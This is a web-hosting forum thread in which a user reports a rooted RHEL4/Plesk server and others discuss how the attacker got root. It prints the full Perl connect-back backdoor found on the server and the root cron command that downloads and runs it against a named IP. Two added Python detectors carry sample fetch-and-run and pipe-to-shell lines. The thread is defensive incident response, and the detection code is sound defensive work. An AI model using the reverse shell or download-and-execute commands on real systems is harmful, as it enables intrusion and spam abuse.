Server hacked - unable to log case at Support panel [SOLVED]

biggles
Forum Regular
Posts: 806
Joined: Tue Jul 15, 2008 2:38 pm
Location: Sweden


Unread post by biggles »

Hi,

My server has been hacked. Rootkit Hunter detects rootkits and it seems like they are using my server for sending spam. ASL hasn't prevented the attack and now I am in desperate need of help. But the support panel https://support.prometheus-group.com/ isn't working. It just gives an error message "There was an error processing your request. Please contact the webmaster. Redirected from: portal.php".

What should I do now? The wiki entry isn't very helpful. It just says look for suspicious files... I could get everything back to the way it was before it got hacked, but they will probably use the same backdoor to hack it again.

The hacking launched a script with the following content:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
Last edited by biggles on Sat Oct 25, 2008 8:18 am, edited 1 time in total.

Unread post by biggles »

The script was run from cron:
(root) CMD (cd /tmp ; wget http://flaviu.conf-team.com/d.pl ; perl d.pl 88.191.98.145 23 ; rm -rf d.pl)
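The cron entry above is the kind of thing a defender wants to catch automatically: a root job that changes into a world-writable directory, downloads a file, runs it with an interpreter and deletes it. The following is an added example, not code from the thread or from Atomicorp, that scores CRON syslog lines against a small set of such indicators. The log lines, hostname, URL (example.invalid) and IP (192.0.2.10) are constructed for the example and are not the values from the thread.

```python
import re

# Constructed sample CRON syslog lines (hostnames, URLs and IPs are placeholders).
SAMPLE_CRON_LOG = """\
Oct 24 03:15:01 host CROND[1234]: (root) CMD (run-parts /etc/cron.hourly)
Oct 24 03:20:01 host CROND[1240]: (root) CMD (cd /tmp ; wget http://example.invalid/d.pl ; perl d.pl 192.0.2.10 23 ; rm -rf d.pl)
Oct 24 03:25:01 host CROND[1251]: (apache) CMD (/usr/bin/php /var/www/cron.php)
Oct 24 03:30:01 host CROND[1260]: (root) CMD (curl -s http://example.invalid/x.sh | sh)
"""

# "(user) CMD (command)" as written by vixie-cron / cronie into syslog.
CMD_RE = re.compile(r"\((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)\s*$")

# Each indicator is (name, regex). Order is fixed so reports are stable.
INDICATORS = [
    ("download-tool", re.compile(r"\b(?:wget|curl|fetch)\b")),
    ("world-writable-dir", re.compile(r"(?:^|\s)/(?:tmp|var/tmp|dev/shm)(?:/|\s|$)")),
    ("interpreter-on-downloaded-file",
     re.compile(r"\b(?:perl|python|sh|bash|php)\s+\S+\.(?:pl|py|sh|php)\b")),
    ("pipe-to-shell", re.compile(r"\|\s*(?:sh|bash)\b")),
    ("self-delete", re.compile(r"\brm\s+(?:-\w+\s+)*\S+")),
]


def parse_cron_line(line):
    """Return (user, command) for a CROND 'CMD' line, or None for anything else."""
    m = CMD_RE.search(line)
    if not m:
        return None
    return m.group("user"), m.group("cmd")


def score_command(cmd):
    """Names of all indicators that match the command string."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def find_suspicious(log_text, min_hits=2):
    """Flag cron jobs matching at least min_hits indicators.

    A single indicator (e.g. php running a .php file) is normal; a root job that
    both downloads something and removes it afterwards is not.
    """
    findings = []
    for line in log_text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        user, cmd = parsed
        hits = score_command(cmd)
        if len(hits) >= min_hits:
            findings.append({"user": user, "cmd": cmd, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_CRON_LOG):
        print(f"[{f['user']}] {', '.join(f['indicators'])}: {f['cmd']}")
```

On a real host the same logic can be fed /var/log/cron (RHEL) or the output of `crontab -l -u root` and the files under /etc/cron.d; the threshold is deliberately conservative so that legitimate jobs with one odd feature are not reported.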

Unread post by biggles »

They have installed something called verlihub. I read on the website that it is some kind of Direct Connect. Doesn't sound good....

Unread post by biggles »

They had changed the login options for the user bin and permitted it to login.
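A system account such as bin being given a login shell is a cheap persistence trick and a simple one to audit for. The following is an added example, not code from the thread, that parses passwd-format text and reports system accounts with an interactive shell and any non-root account with UID 0. The passwd content is constructed for the example, and the UID cutoff of 499 is an assumption based on the RHEL 4 era convention of system UIDs below 500.

```python
# Constructed /etc/passwd content for the example (not the thread's server).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
alice:x:500:500:Alice:/home/alice:/bin/bash
backup:x:0:0:backup:/root:/bin/bash
"""

# Shells that do not allow an interactive login.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}

# Assumption: UIDs below 500 are system accounts (RHEL 4 default; newer distros use 1000).
SYSTEM_UID_MAX = 499


def parse_passwd(text):
    """Parse passwd(5) lines into dicts; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def audit_accounts(entries):
    """Return (account, reason) pairs for accounts that should not be able to log in."""
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            # A second UID-0 account is a classic backdoor.
            findings.append((e["name"], "uid-0-alias"))
        if (e["uid"] <= SYSTEM_UID_MAX and e["name"] != "root"
                and e["shell"] not in NOLOGIN_SHELLS):
            # Daemon accounts like bin, daemon, apache should never have a real shell.
            findings.append((e["name"], "system-account-with-login-shell"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_accounts(parse_passwd(SAMPLE_PASSWD)):
        print(f"{name}: {reason}")
```

Run against the real file with `parse_passwd(open("/etc/passwd").read())`; on a server where the integrity checker (OSSEC in ASL's case) has a baseline of /etc/passwd, any change to the shell field of a system account should also show up as a syscheck alert.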
breun
Long Time Forum Regular
Posts: 2813
Joined: Sat Aug 20, 2005 9:30 am
Location: The Netherlands

Unread post by breun »

You need root access to change login options and it seems they also had root access to add that cron job. They must have exploited some vulnerability to get root access. What OS are you running? All updates applied? Were you running the ASL kernel?

Do you allow root SSH login using a password? Or they may have cracked your Plesk admin password and added the cron job that way (if you haven't explicitly disabled being able to change root's crontab from Plesk).
Lemonbit Internet Dedicated Server Management

Unread post by biggles »

Yeah, they probably gained root access. The server is RH EL4 running in a hosted VZ-container. So I am not able to run the ASL-kernel.

Everything is updated with yum and ASL.

Root login is not permitted. It is unlikely they have done the change through the Plesk-interface. The password is long and contains special characters.

It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS. Now I don't really know. My ASL subscription seems kinda wasted money...

Unread post by breun »

biggles wrote: It is the same thing that happened this summer that made me get ASL. Then I thought they got in by using a security hole in Joomla or ExponentCMS.
Exploiting security holes in a CMS doesn't get you root access. Something more serious happened in this case.

Unread post by biggles »

OK. Good to hear that at least!

I have key-based SSH-login to the server and I cannot imagine how they could hack the Plesk password...
scott
Atomicorp Staff - Site Admin
Posts: 8355
Joined: Wed Dec 31, 1969 8:00 pm
Location: earth

Unread post by scott »

They could have gotten in through another guest host, or by compromising the main server itself. Or even your desktop, best thing to do at this point would be to secure the /var/ossec/logs/ to another box for analysis.

Unread post by biggles »

Logs secured!

Unread post by biggles »

I am having a very good discussion with support now. The only problem is that my hosting company insists that this is a PHP backdoor that has been used and they are not willing to cooperate at all...
faris
Long Time Forum Regular
Posts: 2321
Joined: Thu Dec 09, 2004 11:19 am

Unread post by faris »

Please let us know the outcome. It isn't nice when this happens to anyone.

Unread post by biggles »

Unfortunately there isn't any nice outcome. I still haven't the faintest idea why this happens and I don't have any idea how to stop it. They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it definitely could happen with just a faulty script. I don't really know where to look...

Unread post by breun »

biggles wrote: They gained root access. Here it is suggested that it couldn't happen by just executing some php-scripts from a CMS and my hosting provider says it definitely could happen with just a faulty script.
Your webserver and scripts don't run as root. An exploitable script can let an attacker run code, but it won't give him root access directly. To get to root, the attacker must have exploited something else to escalate privileges. Being able to run code in the first place helps of course, so a vulnerable script may have been the initial attack vector. I remember the vmsplice local root exploit from February this year, but if the server is running an up-to-date kernel (is it?), the attacker can't have used that one.

Unread post by biggles »

I really don't know. I am just renting a few servers based on RH EL4 with Plesk 8.3 which is running in Virtuozzo containers.